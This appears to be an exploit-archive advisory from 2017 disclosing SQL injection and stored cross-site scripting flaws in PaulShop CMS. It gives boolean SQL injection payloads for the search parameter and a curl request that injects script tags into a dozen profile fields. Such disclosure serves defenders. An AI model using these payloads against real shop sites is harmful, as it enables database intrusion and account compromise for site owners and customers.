PaulShop Cross Site Scripting / SQL Injection

PaulShop Cross Site Scripting / SQL Injection: Posted Jul 24, 2017; Authored by BTIS Team; PaulShop suffers from cross site scripting and remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | 7c3af021c23b188fe48f320ae94baafff3bb919f1fe1a6986ef714449c4046f4; Download | Favorite | View

PaulShop Cross Site Scripting / SQL Injection

# Exploit Title: PaulShop CMS - Sql Injection and stored XSS
# Date: 07/23/2017
# Exploit Author: BTIS Team (http://www.btis.vn)
# Vendor Homepage: [https://codecanyon.net/item/paulshop-cms-with-shopping-cart-system/18070714]
# Version: 03/27/2017
# Tested on: Apache/2.4.7 (Ubuntu)
# Contact: research@btis.vn
# Can not contact vendor
 
  
 
1. Description
 
- SQL Injection on Search page with "q" parameter (GET)
 
- Stored XSS on member's profile page with parameters: firstname, lastname, address, city, state, zipcode, phone, fax, delivery[address], delivery[city], delivery[state], delivery[zipcode]
 
2. Examples
 
  
 
- SQL injection: 
 
  
 
# http://localhost/shop/en/category/tables?q=[SQL INJECTION HERE]
 
# Payload: - True condition: europe' and 1=1)-- -
 
           - False condition: europe' and 1=0)-- -
 
  
 
- Stored XSS: 
 
  
 
# Payload: %22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
 
# curl -X POST \
 
  'http://localhost/shop/en/account?save=1' \
 
  -H 'cookie: cookie: mysession_id=QyB45exW7W2fwIi; ci_session=ab1c04c51042f9928a87bb917b1a4759e9f81d11' \
 
  -b 'cookie: mysession_id=QyB45exW7W2fwIi; ci_session=ab1c04c51042f9928a87bb917b1a4759e9f81d11' \
 
  -d 'email=btis%40mailinator.com&password=123456xyz&firstname=BTIS%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&lastname=VN%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&address=address%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E&city=city%22%3E%3Cscript%3Ealert%284%29%3C%2Fscript%3E&state=HCM%22%3E%3Cscript%3Ealert%287%29%3C%2Fscript%3E&zipcode=700000%22%3E%3Cscript%3Ealert%2812%29%3C%2Fscript%3E&country=VN&phone=%22%3E%3Cscript%3Ealert%2810%29%3C%2Fscript%3E&fax=fax%22%3E%3Cscript%3Ealert%286%29%3C%2Fscript%3E&delivery%5Baddress%5D=adr2%22%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&delivery%5Bcity%5D=city2%22%3E%3Cscript%3Ealert%288%29%3C%2Fscript%3E&delivery%5Bstate%5D=MNB%22%3E%3Cscript%3Ealert%289%29%3C%2Fscript%3E&delivery%5Bzipcode%5D=800000%22%3E%3Cscript%3Ealert%2811%29%3C%2Fscript%3E&delivery%5Bcountry%5D=AD&save=Save'
 
  
 
Quan Minh TAC/m / TrAEdega>>ng phA2ng ka>>1 thuaot
 <mailto:tamqm@btis.vn> tamqm@btis.vn / 01284 211 290
 
CANG TY CANG NGHa>> BaoC/O TAN 
028 3810 6288 a 028 38106289
5A TraoSSn VAn DAEdeg, phAEdega>>ng 13, quaon TAC/n BA!nh, Tp.Ha>> ChA Minh
 <http://www.btis.vn> www.btis.vn

Top Authors In Last 30 Days

Red Hat 223 files
Ubuntu 57 files
LiquidWorm 23 files
Debian 19 files
indoushka 15 files
Apple 9 files
Google Security Research 5 files
Gentoo 5 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,158)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,830)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,245)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,969)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

PaulShop Cross Site Scripting / SQL Injection

PaulShop Cross Site Scripting / SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PaulShop Cross Site Scripting / SQL Injection

Share This

PaulShop Cross Site Scripting / SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems